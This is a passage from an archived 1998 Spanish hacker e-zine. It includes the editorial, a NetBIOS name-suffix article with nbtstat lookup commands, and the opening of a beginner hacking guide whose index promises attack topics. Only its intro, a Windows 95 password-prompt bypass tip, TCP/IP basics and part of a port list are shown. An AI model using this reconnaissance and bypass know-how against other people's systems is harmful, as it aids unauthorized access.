home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / jjf / jjf007.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  329.7 KB  |  9,059 lines

  1.    .    .          .    .    .    .    .   .   .    .             .
  2.               .       .   .     .    .             .    .     .         .
  3.  .     .   .     .         ▄  .  █▄ . ▄ .  █ . █ .    .         .     .   .
  4.   .                   . █▄███▄█▄███▄▄████▄███▄████▄██▄     .             .
  5.       .      .     .    │                  ┌──────┐  │  .          .
  6.     .   .    .        . │                  │██████│  │    .                 .
  7.  .               .      │           ┌──────┤██┌───┘  │         .         .
  8.      .     .         .  │    ┌──────┤██████│██└─┐    │  .          .   .
  9.   .       .   .     .   │    │██████├─┐██┌─┤████│    │      .   .
  10.         .               │    └─┐██┌─┴┐│██│J│██┌─┘    │                 .   .
  11. .   .       .   .  .    │  ┌──┐│██│██└┘██│J│██│      │ .   .       .
  12.           .          .  │  │██└┘██│██████│F├──┘      │         .          .
  13.    .           .        │  │██████├──────┴─┘         │     .         .
  14.   .  .    .  .          │  └──────┘                  │   .           .      .
  15.                  .  .   │   H A C K E R S  T E A M   │      .   .    .   .
  16.      .        .         │       J O U R N A L        │  
  17.   .    .   .      .     ╠────────────────────────────╣  .         .        .
  18. ▄     ▄        ▄██    .█│     VOL. #2, Nº7, 1998.    │    .  ▄      █   .
  19. ██▄█▄██▄█▄▄██▄█████▄█▄██╚────────────────────────────╝█▄█▄▄▄███▄██▄██▄▄█▄██▄█▄
  20.  
  21.            IS COMPUTERWORLD TURNING HONEST CITIZENS INTO CRIMINALS?
  22.  
  23. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  24.  
  25.      Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
  26.            de la informacion aqui expuesta y tampoco tiene que estar
  27.            de acuerdo con lo que sus colaboradores opinen.
  28.            Tampoco esperamos que la gente use la informacion aqui expuesta
  29.            para hacer daño ya que tan solo es con fines didacticos.
  30.  
  31.      Recomendado el uso del editor del MS-DOS.
  32.  
  33. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  34.  
  35.      #CURRENT MEMBERS :
  36.  
  37.      - CONDE VAMPIRO     - CODER  H/P/V    EDITOR
  38.      - MAC CRACK         - CODER  C/P      WEBMASTER
  39.      - Mr ELEKTRO        -        H/P      ADMIN
  40.      - TASSLEHOFF        - CODER  H        CO-WEBMASTER
  41.      - Dr BINIX          - CODER  H/P/V/C  ADMIN
  42.  
  43.      #WEB OFICIAL :
  44.  
  45.      - http://www.jjf.org
  46.  
  47.      #E-MAIL OFICIAL :
  48.  
  49.      - team@jjf.org    
  50.  
  51.      #LLAVE PGP OFICIAL :
  52.      
  53.    -----BEGIN PGP PUBLIC KEY BLOCK-----
  54.     - J.J.F. / Hackers Team -
  55.         http://www.jjf.org
  56.    Version: PGPfreeware 5.5.3i
  57.  
  58.    mQGiBDZqHkERBAD4s9uK0aNWwmeJH6f0FMiZKgH9S/cny5vhhKwbNuNSoPxEip2g
  59.    +GNkBB0yCf/sSSdiwZBxrTk3IYzuZwF3LbdZPoimkKKxiGHX0s6kZ0zCT5/1kdQz
  60.    FSFEx/fN6gBBPMZAIjgbYF0K7p5aixWe1CyWiowgmy30Cb8t1rn3+q+nNwCg//A8
  61.    N+74OrsDv1gc6eonMjAibB8D/RxTG9Afr8ORnc6lN0nuXP1kVLZ+nPDjMnL5P0os
  62.    e8IDLe3kFnp8lwSYjgE5nGT0w5tzmjJV1DSTkHacUvVH2lio4JbJ0w7ylfonW9C6
  63.    aqjkV+lU45tFffP4iO+wM6/kSrxuQPROvDElWoYEZUWwRqpZZSaPM7Iw8wPeaR9M
  64.    oT3oA/wK1bwpQlXK7rH0dG0DDUcgy3/pTX2DAmdAyIAmuU526VNBmGIODJDdDHCC
  65.    mSTsxVhtDheTp8mBqwWt8TWTRfeKg1Ccm/mL7+oQI5TLPrS4msWfTsMTjQruFCAq
  66.    p5SBcLvBZ9pPR4KjAzWf5kSVE/cLuP7Jj4f7HnFOqAw4y/ev57QoLSBKLkouRi4g
  67.    LyBIYWNrZXJzIFRlYW0gLSA8dGVhbUBqamYub3JnPokASwQQEQIACwUCNmoeQQQL
  68.    AwIBAAoJEOhzSELU8x87xCIAoLNY3rnGqxkDm970wixwOVH4H1rAAKCZsi8jqCco
  69.    bjTOzvPesvCYwBhEM7QbRHIgQmluaXggPGRyX2Jpbml4QGpqZi5vcmc+iQBLBBAR
  70.    AgALBQI2ah5lBAsDAgEACgkQ6HNIQtTzHzt74gCaAuhdloIMsjBDxQRDADe9L25m
  71.    KlQAoL9Zw1zAv4y0VqPGZJJ/WEFJ4JfItBxNciBFbGVrdHJvIDxlbGVrdHJvQGpq
  72.    Zi5vcmc+iQBLBBARAgALBQI2ah59BAsDAgEACgkQ6HNIQtTzHzv/4gCeKM0YdlTN
  73.    ZiExhngl9fq/EZxA35QAn1b0hjcD7RI0MezP1U3aVRmogaDstB9UYXNzbGVob2Zm
  74.    IDx0YXNzbGVob2ZmQGpqZi5vcmc+iQBLBBARAgALBQI2ah6QBAsDAgEACgkQ6HNI
  75.    QtTzHzupLACdH60mXOsIcs759w3zmPeumj2eHD4An27x3t9nLXvpsC++kqX/uWnk
  76.    8c2BtBdNYWMgQ3JhY2sgPG1hY0BqamYub3JnPokASwQQEQIACwUCNmoeowQLAwIB
  77.    AAoJEOhzSELU8x87gJYAoJxFRmMw2M9JyKkuiw7pgQwO86gfAKDQ8FBhSEHO6vqC
  78.    i+gQucPt6FTziLQdQ29uZGUgVmFtcGlybyA8Y29uZGVAampmLm9yZz6JAEsEEBEC
  79.    AAsFAjZqHrwECwMCAQAKCRDoc0hC1PMfO7AZAKCCvW3avqxvbIMqSMr6gAs6N1Yh
  80.    EwCgxvh6XxV0UsliM0I9NiCRAh9+fm25Ag0ENmoeQRAIAPZCV7cIfwgXcqK61qlC
  81.    8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh
  82.    01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB
  83.    qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst
  84.    jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn
  85.    CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky
  86.    CzsAAgIIANRtpu28Urbml240QB6rpLJwpRVamQJDb9bAdE1PmbFzw0g5u59lFV74
  87.    35cacXl0LvZgTY9m61Z+IUldIFflJO2bFnNRRVJPJO8uC84T4cHOge/+czhR1SUB
  88.    FKa8MQj71aX3qnAAXjn3vDmfLIH7NUqkJ/XkvBU6yO4Bk3eNta0aHWBxsLboF69g
  89.    mVhQ19OaP4MOPdNID6k85HW7IXzRdt8nwwcaUiTp2YNmn9DW4h/QLp8Tr/iTReko
  90.    AmA89xzu9YQwc7Io5NmhqzrVYrfvEMXhlWLMZYUObnaifarKqUOwoeq2oUtLNqyE
  91.    oV4r8uob/m740FixtcFpg8Npvha1kuqJAEYEGBECAAYFAjZqHkEACgkQ6HNIQtTz
  92.    HzuP3gCfbzDnGPm9X2F4XOkV1lU0BZsiuYwAoKdHNilOKmpnKPmz2ApogjMfM1sc
  93.    =HQVG
  94.    -----END PGP PUBLIC KEY BLOCK-----
  95.  
  96.      
  97.      #DISTRIBUIDORES OFICIALES DEL E-ZINE :
  98.  
  99.      - http://wakanda.islatortuga.com
  100.      - http://underhack.islatortuga.com
  101.      - http://personal.redestb.es/cheroky-1 
  102.      - http://members.xoom.com/baron_rojo/
  103.      - http://members.xoom.com/rifoxxx
  104.      - http://www.bigfoot.com/~u_taker
  105.      - http://phucksys.dyn.ml.org
  106.      - http://www.bigfoot.com/~proyecto_r
  107.      - http://members.xoom.com/zine_store/
  108.      - http://visitweb.com/disciples 
  109.  
  110.      #MIEMBRO OFICIAL (web ring) DE :
  111.  
  112.      - Black Angels
  113.      - Spanish Underground Web Ring
  114.  
  115.      #COLABORADORES CON ESTE NUMERO :
  116.  
  117.      - {CyBoRg} (SHG Security)
  118.      - EiVoL (Hack Trax & HoLoCaUsTo)
  119.      - Bisho
  120.      - PoSiDoN
  121.      - Nobody
  122.  
  123.      #SALUDOS :
  124.  
  125.      - Metalslug (Wakanda)           - NeonSurge (Rhino9)
  126.      - Schoddy Guy (Underhack)       - L0pth
  127.      - Cheroky                       - Ivan Arce (CORE SDI S.A.)
  128.      - Silicon Dragon                - Proyecto R
  129.      - Paseante (SET)                - SHG Security
  130.      - Dr Slump (oioio)
  131.  
  132. <────────────────────────────────────────────────────────────────────────────>
  133. <────────────────────────────────────────────────────────────────────────────>
  134. <────────────────────────────────────────────────────────────────────────────>
  135.  
  136.   - INDICE.                                  
  137.  
  138.     TITULO                                        AUTOR
  139.   ────────────\_______________________________/────────────
  140.  
  141.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  142.   * SIGNIFICADO DE NETBIOS ................... {CYBORG}.
  143.   * LA SUPER GUIA DEL HACKER
  144.     VERSION DELUXE ........................... NOBODY.
  145.   * CYBERANGEL: UN PROGRAMA, UN
  146.     PASSWORD, UN MONTON DE SEGURIDAD ......... MAC CRACK & TASSLEHOFF.
  147.   * CURSO DE HACK VII ........................ CONDE VAMPIRO.
  148.   * TROYANOS EN LINUX ........................ POSIDON.
  149.   * TODO (O CASI TODO) SOBRE
  150.     El SMURFING V1.0 ......................... MAC CRACK.
  151.   * UTILIDADES DCL PARA EL HACKER DE VMS ..... EIVOL.
  152.   * QUE ES UN HACKER ......................... TASSLEHOFF.
  153.   * CONSEAL PC FIREWALL BUG .................. BISHO.
  154.   * EL LECTOR OPINA .......................... VARIOS.
  155.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  156.  
  157. <────────────────────────────────────────────────────────────────────────────>
  158. ██████████████████████████████████████████████████████████████████████████████
  159. <────────────────────────────────────────────────────────────────────────────>
  160.  
  161.   -------------
  162.   │ EDITORIAL │
  163.   -------------
  164.  
  165.         Bueno chicos, tras un largo periodo hemos vuelto como siempre, pero
  166.   esta vez tenemos buenos motivos para a ver sacado este numero en esta fecha
  167.   concreta, pues resulta que cumplimos 1 AñO de revista :)))) Quien lo diria,
  168.   cuando empezamos esta loca odisea, algunos nos criticaron pero poco a
  169.   poco hemos demostrado que estamos a la altura de cualquier ezine. Decir
  170.   que este esfuerzo a sido gracias a muy pocos, ya que todavia necesitamos
  171.   que la gente escriba articulos, ya que si no no haremos gran cosa, pero en
  172.   fin seguiremos como siempre.
  173.   
  174.         Como haveis podido comprobar, estamos muy activos ya que ahora tenemos
  175.   domimo propio :) hemos comenzado la distribucion de nuestros "white papers"
  176.   conocidos como - J.J.F. / Hackers Team - Security Documentation, tambien
  177.   estamos distribuyendo nuestro software de seguridad y llevando un equipo
  178.   de voluntarios para participar en el concurso internacional de RC5,
  179.   conocido como JJF RC5 Crack Team, en el cual esperamos que todos vosotros
  180.   que nos leeis, os apunteis :))
  181.  
  182.         Estad atentos a todos los cambios que se han producido en
  183.   - J.J.F. / Hackers Team -, los cuales han sido muchos, como TODAS NUESTRAS
  184.   DIRECCIONES DE CORREO ademas de NUESTRA NUEVA LLAVE PGP. Por lo que para
  185.   poneros en contacto con nosotros debeis usar las nuevas direcciones.
  186.  
  187.         Por otro lado, tenemos un nuevo miembro en nuestras filas, Dr Binix al
  188.   cual le damos la bienvenida en - J.J.F. / Hackers Team -. Tambien tenemos 3
  189.   distribuidores mas que son los siguientes http://www.bigfoot.com/~u_taker
  190.   llevado por TAkER y el otro es http://phucksys.dyn.ml.org llevado por
  191.   GabberMan, y por ultimo el website http://members.xoom.com/zine_store/
  192.   llevado por MAU, el siguiente es http://visitweb.com/disciples llevado por
  193.   Avathar.
  194.  
  195.         Como vereis muchas cosas han cambiado, nos hemos vuelto mas abiertos,
  196.   en el sentido del website, ya que nuestra intencion no es inducir a la
  197.   delincuenia sino todo lo contrario, ayudar a mejorar la seguridad y ayudar
  198.   a los admin's a que conozcan los peligros pero tambien sin olvidarnos
  199.   todas esas personas que quieren ser hackers, o sea nuestros fieles lectores.
  200.   En nuestro nuevo domino notareis muchos cambios que seguro que os seran
  201.   muy gratos y recomendamos leer nuestro FAQ, el cual os resolvera todas
  202.   las dudas que tengais.
  203.  
  204.         Para cualquier articulo, duda, consulta sobre el ezine, simplemente
  205.   debeis escribir a nuestro buzon de mail:
  206.  
  207.   editor@jjf.org
  208.                                                    - J.J.F. / HACKERS TEAM -
  209.  
  210. <────────────────────────────────────────────────────────────────────────────>
  211. ██████████████████████████████████████████████████████████████████████████████
  212. <────────────────────────────────────────────────────────────────────────────>
  213.  
  214.                          /----------------------\
  215.                         - SIGNIFICADO DE NETBIOS -
  216.                          \----------------------/
  217.  
  218.         Bueno os mando algo sobre netbios, espero que os guste.
  219.  
  220.         Vamos a ver por donde empezamos, cuantas veces habeis echo un nbtstat
  221.   y os han salido un monton de cosas y no sabeis el significado de ellas,
  222.   solo con saber si hay un <20> os basta, pero esto no es asi, hay que saber
  223.   el porque de cada cosa. Asi que en este texto os explicare que significa 
  224.   cada cosa rara que sale. 
  225.  
  226.         Los nombres de NETBIOS pueden tener una loguitud de 16 caracteres y
  227.   el caracter 16th es especial que es usado por los servicios de red de
  228.   microsoft.
  229.  
  230.         Hay dos tipos en un entorno NetBIOS, Unique (unico) y Group (Grupo).
  231.   Un nombre unique deber ser unico en la red, mientras que un nombre Group no
  232.   tiene porque ser unico y todos los procesos que tiene un determinado grupo,
  233.   pertenecen al grupo. Cada nodo NetBIOS mantiene una tabla de todos los
  234.   nombres actuales en el nodo. La siguiente tabla de NetBIOS, muestra los
  235.   poxibles subfijos en hexadecimal.
  236.  
  237.   Name Number Type Usage 
  238.  
  239.   <computername> 00 U Workstation Service 
  240.   <computername> 01 U Messenger Service 
  241.   <\\_MSBROWSE_> 01 G Master Browser 
  242.   <computername> 03 U Messenger Service 
  243.   <computername> 06 U RAS Server Service 
  244.   <computername> 1F U NetDDE Service 
  245.   <computername> 20 U File Server Service 
  246.   <computername> 21 U RAS Client Service 
  247.   <computername> 22 U Exchange Interchange 
  248.   <computername> 23 U Exchange Store 
  249.   <computername> 24 U Exchange Directory 
  250.   <computername> 30 U Modem Sharing Server Service 
  251.   <computername> 31 U Modem Sharing Client Service 
  252.   <computername> 43 U SMS Client Remote Control 
  253.   <computername> 44 U SMS Admin Remote Control Tool 
  254.   <computername> 45 U SMS Client Remote Chat 
  255.   <computername> 46 U SMS Client Remote Transfer 
  256.   <computername> 4C U DEC Pathworks TCPIP Service 
  257.   <computername> 52 U DEC Pathworks TCPIP Service 
  258.   <computername> 87 U Exchange MTA 
  259.   <computername> 6A U Exchange IMC 
  260.   <computername> BE U Network Monitor Agent 
  261.   <computername> BF U Network Monitor Apps 
  262.   <username> 03 U Messenger Service 
  263.   <domain> 00 G Domain Name 
  264.   <domain> 1B U Domain Master Browser 
  265.   <domain> 1C G Domain Controllers 
  266.   <domain> 1D U Master Browser 
  267.   <domain> 1E G Browser Service Elections 
  268.   <INet~Services> 1C G Internet Information Server 
  269.   <IS~Computer_name> 00 U Internet Information Server 
  270.   <computername> [2B] U Lotus Notes Server 
  271.   IRISMULTICAST [2F] G Lotus Notes 
  272.   IRISNAMESERVER [33] G Lotus Notes 
  273.   Forte_$ND800ZA [20] U DCA Irmalan Gateway Service 
  274.  
  275.   Unique (U) .- Debe tener solamente una IP asignada. 
  276.   Group (G) .- El nombre unico debe existir con varias direcciones IP. 
  277.   Multihomed (M) .- El nombre es unico, pero debido a varias tarjetas de red
  278.                     en el mismo ordenador, se le permite en la registracion.
  279.                     Numero maximo de direcciones es 25. 
  280.   Internet Group (I) .- Configuracion especial del grupo, nombre usado por el 
  281.                         nombre de dominios de WINNT. 
  282.   Domain Name (D) .- Esto es nuevo en NT 4.0. Nombre del dominio. 
  283.  
  284.   1.- TIPO UNIQUE significado del 16th: 
  285.  
  286.         <00> Nombre del servicio de la estacion de trabajo, este es el nombre
  287.   al que se refiere el nombre del NETBIOS. 
  288.  
  289.         <03> Nombre del servico de mensajeria, es usado cuando recibimos o
  290.   emviamos mensajes. Este nombre esta registrado con el servidor WINS. 
  291.  
  292.         <1B> Nombre del Dominio Principal. Identifica al primer contralador de 
  293.   Dominio. 
  294.  
  295.         <06> Servicio de servidor RAS. 
  296.  
  297.         <1F> Servicio NetDDE. 
  298.  
  299.         <20> Nombre del servicio servidor, nos indica que hay algo compartido. 
  300.  
  301.         <21> Cliente RAS. 
  302.  
  303.         <BE> Monitor de agente de red. 
  304.  
  305.         <BF> Utilidad de monitor de red. 
  306.  
  307.   2.- TIPO GROUP significado del 16th: 
  308.  
  309.         <1C> Nombre del grupo de dominio. Contiene la lista de dirreciones los 
  310.   equipos que estan registrados en el dominio. 
  311.  
  312.         <1D> Nombre del master Browser, es usado por los equipos clientes para 
  313.   acceder a =e9l. 
  314.  
  315.         <1E> Nombre de un grupo normal. 
  316.  
  317.         <20> Nombre de un grupo especial, llamado grupo de internet que es 
  318.   registrado con un servidor de WINS que identifica grupos de equipos con
  319.   fines administrativos.
  320.  
  321.         _MSBROWSE_ Va en relacion con el nombre del Dominio. 
  322.  
  323.         Para un rapido testeo de todo esto, se pueden utilizar los siguientes
  324.   comandos desde una ventana de MS-DOS: 
  325.  
  326.   nbtstat -A direccion IP 
  327.   nbtstat -a Host 
  328.  
  329.         Las sesiones NetBIOS son bidireccionales, requiere un proceso de
  330.   cliente y otro de servidor, es decir, requiere la cooperacion de 2
  331.   ordenadores. La mayoria de NetBIOS implementada para TCP/IP lleva a cabo
  332.   una resolucion de nombres pero usando cualquier broadcast o fichero LMHOSTS.
  333.   Cuando NetBIOS esta sobre TCP/IP se le conoce como modulo NBT.
  334.  
  335.         Tambien tenemos el SMB (Servidor Mensajes Bloque), es un tipo de
  336.   protocolo de mensajeria en una LAN entre clientes y servidores, que se usa
  337.   para comunicarse entre ellos. El SMB es un protocolo de nivel superior que
  338.   puede ser transportado sobre NetBEUI, NetBIOS sobre IPX y NBT. SMB es usado
  339.   por Windows 3.x, Win95, WinNT y OS/2. Permite acceder a directorios 
  340.   remotamente. 
  341.  
  342.   Texto escrito por: {CyBoRg} 
  343.   SHG Security 
  344.  
  345. <────────────────────────────────────────────────────────────────────────────>
  346. ██████████████████████████████████████████████████████████████████████████████
  347. <────────────────────────────────────────────────────────────────────────────>
  348.                                                                    02-11-1998.
  349.                                                                      ??????                                                                     
  350.                       ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
  351.                       ░▒╔═════════════════════════════╗▒░
  352.                       ░▒║┌  LA SUPER GUIA DEL HACKER ┐║▒░
  353.                       ░▒║│╔═════════════════════════╗│║▒░
  354.                       ░▒║│╚═════════════════════════╝│║▒░
  355.                       ░▒║└        by Nobody          ┘║▒░ 
  356.                       ░▒╚═════════════════════════════╝▒░
  357.                       ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
  358.  
  359.                       <<<<<<<<<<VERSION DELUXE>>>>>>>>>>>
  360.  
  361. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  362.  
  363.   Nota Del Autor: No me hago responsable de la mala utilizacion de la
  364.                   informacion aqui expuesta ya que tan solo es para fines
  365.                   didacticos.
  366.                   Esta guia es de distribucion libre excepto para las
  367.                   instituciones gubernamentales que deberan abonar 2000 pts
  368.                   a alguna fundacion para apadrinar niños.
  369.  
  370. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  371.  
  372.   - INDICE:
  373.  
  374.   1 ......................... Que Es Esta Guia Exactamente ?
  375.   2 ......................... Descripcion General De Windows.
  376.    2-1 ...................... Seguridad En Windows.
  377.   3 ......................... Protocolo TCP/IP y Demas Historias.
  378.    3-1....................... Puertos.
  379.    3-2....................... Ftp.
  380.    3-3....................... Telnet.
  381.   4 ......................... Hacking Basico En Windows. 
  382.    4-1 ...................... Phf.
  383.    4-2 ...................... Ftp.
  384.    4-3 ...................... Ping De La Muerte.
  385.    4-4 ...................... Recursos Compartidos.
  386.    4-5 ...................... Fake Mail Con El Telnet.
  387.    4-6 ...................... Cambiando El Entorno.
  388.    4-7 ...................... Finger.
  389.    4-8 ...................... Whois.
  390.    4-9 ...................... Tracert.
  391.    4-10 ..................... Winipcfg.
  392.    4-11 ..................... Ipconfig.
  393.    4-12 ..................... Arp.
  394.    4-13 ..................... Route.
  395.    4-14 ..................... Netstat.
  396.   5 ......................... Utilizacion De Tools.
  397.    5-1 ...................... SkamWerks Lab version 1.1b.
  398.    5-2 ...................... WaReZ! Version 95.12.31.
  399.    5-3 ...................... John the Ripper v1.4.
  400.    5-4 ...................... Gobbler v 2.1.
  401.    5-5 ...................... Sharepasswd.
  402.    5-6 ...................... Snadboy's Revelation v1.1.
  403.    5-7 ...................... Keylog95.
  404.    5-8 ...................... Glide.
  405.    5-9 ...................... Win95 AnonyMail v 1.0.
  406.    5-10 ..................... Hacker's Utility, V 1.02.
  407.    5-11 ..................... Haktek v1.1.
  408.    5-12 ..................... Claymore Brute Force.
  409.    5-13 ..................... Skream's Port Listener V 2.3.
  410.    5-14 ..................... WSOCK32 Winsock Spy Facility Version .91
  411.    5-15 ..................... PWlTool V 4.0.
  412.    5-16 ..................... PwlView V 1.01.
  413.   6 ......................... Medidas De Seguridad.
  414.    6-1 ...................... Protegiendo Nuestro Ordenador.
  415.     6-1 ..................... Ataques Tipicos a Nuestro Windows.
  416.     6-2 ..................... Encriptacion De Nuestra Informacion.
  417.     6-3 ..................... Eliminar Informacion De Forma Segura.
  418.     6-4 ..................... Eliminacion De Virus.
  419.    6-1-1 .................... Protegiendo Nuestras Acciones.
  420.     6-1-1-1 ................. Borrando Nuestras Huellas.
  421.     6-1-1-2 ................. Encriptando Nuestro Correo.
  422.   7 ......................... Sugerencias Para Un Mejor Hacking.
  423.   8 ......................... Obtener Informacion.
  424.   9 ......................... Despedida.
  425.    9-1 ...................... Agradecimientos.
  426.  
  427. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  428.  
  429.   1. Que Es Esta Guia Exactamente ?
  430.  
  431.   Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no
  432.   quiere aprender unix o no lo sabe manejar (grave error). Pues por esta
  433.   razon esta guia esta enfocada a los usuarios de windows, principalmente
  434.   los de win95/98. Por el contrario esta guia no se dedicara al NT o Unix,
  435.   aunque por supuesto se hara referencia a estos sistemas sobre todo cuando
  436.   son estos mismos Sistemas Operativos en los cuales se centraran nuestros
  437.   actos, supuestamente legales :)
  438.  
  439.   Todo esto que digo puede sonar tonterias y puedes pensar que en win95/98 no
  440.   podras llegar a ser un gran hacker porque es necesario conocer unix, y
  441.   estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para
  442.   hacer sus pinitos a aquellos que solo saber usar win95/98, yo por mi parte
  443.   aconsejo aprender unix por varias razones que no viene a cuento en esta
  444.   guia.
  445.  
  446.   Con esta guia te convertiras en un magnifico Hacker usando un sistema que
  447.   no es propenso al hacking. Como es normal al usar win95/98 estaremos muy
  448.   limitados en muchos aspectos pero podras aprender por ejemplo, algunos
  449.   bug que podras usar en tu favor, la utilizacion de diversas herramientas
  450.   hacker que no estan disponibles generalemente en win95/98 y ademas a usar
  451.   los recursos que te ofrece Internet en tu favor, abreviando un poco tanta
  452.   charla, llegaras a conocer la red de una forma diferente y a manejar
  453.   win95/98 de forma distinta a lo conocido hasta ahora.
  454.  
  455.   Esta es la version Deluxe, de mi conocida guia LA SUPER GUIA DEL HACKER, la
  456.   cual a sido revisada y actualizada, algunas herramientas como el Bo o Netbus
  457.   no seran explicadas debido a que son realmente faciles de usar y ademas
  458.   disponen de gran variedad de opciones y me saldria un documento monstruoso.
  459.   Al igual que me he dejado muchas cosas, que a lo mejor gustaria que
  460.   explicara pero realmente es imposible explicarlo todo, ademas el espiritu
  461.   hacker es aquella persona que simplemente quiere conocer pero debe
  462.   investigar por si misma, de nada sirve que este todo hecho. Por eso os digo:
  463.  
  464.                  "Si juegas a Hacker, piensa como un Hacker."
  465.  
  466.         Surfeando por Internet, he encontrado esta guia pasada a HTML y lo
  467.   mas curioso es que han quitado mi nick del documento (que raro };-), pues
  468.   para estos plagiadores, aqui teneis la version Deluxe para que la volvais
  469.   a copiar!!!!!
  470.  
  471.   2. Descripcion General De Windows.
  472.  
  473.   Como todos sabemos el windows95/98 es un popular sistema operativo de la
  474.   casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy
  475.   sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad
  476.   en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros
  477.   sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual
  478.   es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y
  479.   ejecuta otro programa :) y veras esa famosa Multitarea.
  480.  
  481.   El win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo
  482.   para la gente que busca facilidad, pero no te engañes pensando que es un
  483.   sistema ideal para Internet, puede que para un usuario convencional le sea
  484.   estupendo pero para un Hacker se queda muy corto de calle, ya que le falta
  485.   muchos servicios que otros sistemas operativos si traen como el que ya
  486.   tantas veces he repetido, el Unix (se nota que me encanta??:).
  487.  
  488.   Aqui os dejo de dar la murga sobre win95/98 ya que este texto no esta
  489.   destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no
  490.   creo que este contando nada nuevo sobre windows o sea que mejor me callo y
  491.   si no sabes mucho sobre win95/98, pues ya sabes comprate un libro.
  492.  
  493.    2-1. Seguridad En Windows.
  494.  
  495.   Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no
  496.   tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas
  497.   que nos piden un password las podemos cerrar pulsando sobre la X o tambien
  498.   nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana
  499.   sin meter ningun password. 
  500.  
  501.   Por eso para que nuestro ventanas (nombre que se le da a win95/98 :)
  502.   tendremos que instalarle algun paquete de seguridad disponible por la red,
  503.   que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque
  504.   siempre puedes comprar algun paquete comercial de seguridad, en mi opinion
  505.   alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y
  506.   cuando llega la oportunidad de demostrar su calidad nos falla, ya que no
  507.   hay nada seguro 100%.
  508.  
  509.   Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa
  510.   no es muy dificil, es cuestion de estar atento a las novedades, en otras
  511.   palabras estar informado. Mas abajo ya te entereras de estas cosas.
  512.  
  513.   3. Protocolo TCP/IP y Demas Historias.
  514.  
  515.   El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que
  516.   engloba casi todos los servicios que solemos usar como por ejemplo cuando
  517.   hacemos telnet, mail, ftp o cualquier cosa.
  518.  
  519.   TCP/IP proviene de Transmission Control Protocol y Internet Protocol
  520.   respectivamente. Por fortuna para los usuarios de win95/98, este protocolo
  521.   ya viene incorporado nativamente en el sistema, al contrario que ocurria
  522.   con el windows 3.x, el cual lo teniamos que instalar para poder conectar
  523.   a Internet.
  524.  
  525.   Como has podido comprobar en realidad son 2 protocolos pero que estan
  526.   unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
  527.   la transmision de los paquetes cuando estamos conectados a un servidor. El
  528.   IP es el encargado de que los paquetes llegen a destino por orden aunque
  529.   tomen caminos diferentes.
  530.  
  531.                      * Diagrama del TCP *   
  532.  
  533.         cliente ->  El cliente le envia una  -> servidor
  534.                     solicitud de conexion
  535.                     espeficicando el puerto
  536.                     de conexion al servidor.
  537.  
  538.         cliente <-  El servidor le responde  <- servidor
  539.                     que conoce su peticion
  540.                     de conexion.
  541.  
  542.         cliente ->  El cliente le devuelve   <- servidor
  543.                     otra vez la peticion y
  544.                     el circuito ya esta
  545.                     abierto.
  546.  
  547.                      * Diagrama del IP *
  548.  
  549.        │Informacion general│Direccion IP│Direccion IP│Datos│ 
  550.        │de cabezera.       │de origen   │de destino. │     │
  551.  
  552.   Pues aqui se acaba la explicacion basica de este protocolo, para el que
  553.   este interesado en profundizar le remito a que se pille el RFC 1180 o un
  554.   fichero disponible en multitud de servidores, desgraciadamente no te puede
  555.   asegurar el nombre del fichero ya que lo he encontrado de varias formas
  556.   pero te dare el nombre que aparece al editarlo, ya que en todos es igual:
  557.   
  558.                              Introduction
  559.                                   to
  560.                         the Internet Protocols
  561.  
  562.                       C                       R
  563.  
  564.                               C       S
  565.                   Computer Science Facilities Group
  566.                               C       I
  567.  
  568.                       L                       S
  569.  
  570.                                RUTGERS
  571.                   The State University of New Jersey
  572.  
  573.                              3 July 1987
  574.   
  575.    3-1. Puertos
  576.  
  577.   Antes ya os he explicado muy brevemente la comunicacion del protocolo en
  578.   cuestion. Pues ahora os pongo una extensa lista sobre los distintos
  579.   puertos y sus servicios correspondientes. 
  580.  
  581.     echo                7/tcp
  582.     echo                7/udp
  583.     discard             9/tcp    sink null
  584.     discard             9/udp    sink null
  585.     systat             11/tcp
  586.     systat             11/tcp    users
  587.     daytime            13/tcp
  588.     daytime            13/udp
  589.     netstat            15/tcp
